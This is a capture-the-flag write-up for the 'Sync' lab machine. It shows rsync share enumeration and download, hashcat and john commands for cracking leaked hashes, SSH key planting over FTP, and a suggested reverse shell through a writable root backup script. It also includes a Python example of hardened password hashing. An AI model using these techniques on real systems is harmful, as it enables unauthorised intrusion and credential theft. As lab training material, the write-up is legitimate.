
VL - Sync

Enumeration

Nmap showed the following ports open:

21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
873/tcp  open  rsync
8000/tcp open  http-alt

Visiting the webpage, we noticed a simple login page which we could bypass with a basic SQL injection, but the page itself doesn't contain anything of interest.

FTP did not allow anonymous login, so the only port left is rsync. We can connect to the rsync server with netcat and interact with it:

nc -vn <target> 873

One thing to note is that the first message should be a copy paste of the message it gives you:

@RSYNCD: 31.0 sha512 sha256 sha1 md5 md4

From here we can ask information such as the list with shares:

#list

The session gets closed, but if we open it again and enumerate the share we don't get an error message with AUTHREQD back, meaning that it is an unauthenticated share. We can use rsync to connect to it and list all files:

rsync -av --list-only rsync://<target>:873/httpd

This reveals a list with files which we can download with the following command:

rsync -av rsync://<target>:873/httpd <output directory>

We cannot upload to the share, as it is in read-only mode.

Triss

Now we have our hands on both the source code AND the database of the application; the database holds the hashed passwords of the Admin and Triss users. Let's take a look at the source code to figure out how the application works. index.php reveals how the passwords get hashed:

$hash = md5("$secure|$username|$password");

One of the first lines of index.php contains the $secure value 6c4972f3xxxxxxx2ad3105de01e, so we have 2 of the 3 ingredients needed to reproduce the hash of the user Triss. We can use hashcat to crack the salted MD5 hash, but first we need to put it in a format hashcat understands:

<DB HASH>:6c497XXXXXXXXXXXX3105de01e|triss|

Now we can use hashcat to try to crack the hash:

hashcat -a 0 -m 20 hash.txt /usr/share/SecLists/Passwords/Leaked-Databases/rockyou-75.txt

-m 20 stands for md5($salt.$pass), the salted layout we saw earlier in the source code. With the password recovered we can try to SSH in as Triss, but this fails because an SSH key is required. Since we now have credentials, we can try logging in over FTP instead.
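The reason a leaked index.php was enough: the page's scheme is a single fast MD5 over a static application secret plus the username, so once the source is readable (here via the open rsync share) only the password itself remains unknown. The following is an added example, not code from the box or the writeup, that reproduces that legacy scheme beside a hardened replacement and shows how a login path can migrate existing rows on the fly; the SECURE constant, usernames and passwords are constructed values.

```python
import hashlib
import hmac
import os

# Constructed stand-in for the application's $secure constant. On the box it
# lived in the PHP source that the unauthenticated rsync share handed out.
SECURE = "constructed-secret-value"

SCRYPT_PARAMS = dict(n=2**14, r=8, p=1, dklen=32)


def legacy_hash(secure: str, username: str, password: str) -> str:
    """The page's scheme: md5("$secure|$username|$password").
    With the secret and username known it is a plain, fast MD5 guess."""
    return hashlib.md5(f"{secure}|{username}|{password}".encode()).hexdigest()


def hash_password(password: str) -> str:
    """Hardened form: random per-user salt plus memory-hard scrypt, stored as
    scheme$salt$digest so the verifier knows how to recompute it."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return f"scrypt${salt.hex()}${digest.hex()}"


def verify_password(stored: str, password: str) -> bool:
    scheme, salt_hex, digest_hex = stored.split("$")
    if scheme != "scrypt":
        return False
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    # Constant-time comparison so the check itself leaks nothing about the digest.
    return hmac.compare_digest(digest.hex(), digest_hex)


def login_and_migrate(db: dict, username: str, password: str) -> bool:
    """Accept either scheme. A successful legacy login rehashes the row in
    place, so the MD5 value disappears from the database without a reset."""
    stored = db.get(username)
    if stored is None:
        return False
    if stored.startswith("scrypt$"):
        return verify_password(stored, password)
    if hmac.compare_digest(stored, legacy_hash(SECURE, username, password)):
        db[username] = hash_password(password)
        return True
    return False
```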

If we run ls -la we see the structure of a home directory, meaning that if we can write to this directory we can create a .ssh directory with an authorized_keys file containing our own public key:

mkdir .ssh
put /home/<user>/.ssh/<public.key>

Doing basic enumeration we noticed the /backup directory with zip files owned by root. We can transfer these over with python3 -m http.server and unzip them. They contain both the /etc/passwd and /etc/shadow files, which we can use to crack some more passwords!

unshadow passwd shadow > unshadow

With john we can now crack some hashes!

└─# john --format=crypt unshadow.db --wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-75.txt
saXXXXXra           (sa)
geXXXXXld           (jennifer)
geXXXXXld           (triss)

SA / Root

We can su into the Jennifer user and retrieve the user.txt flag and hop directly over to the SA user.

Running linpeas revealed some interesting files, like the following:

-rwxr-xr-x 1 sa sa 211 Apr 19 19:26 /usr/local/bin/backup.sh

Earlier we retrieved ZIP files with a timestamp; they are created by this script. Since we can edit the script, we can add a reverse shell to it and become root!

This post is licensed under CC BY 4.0 by the author.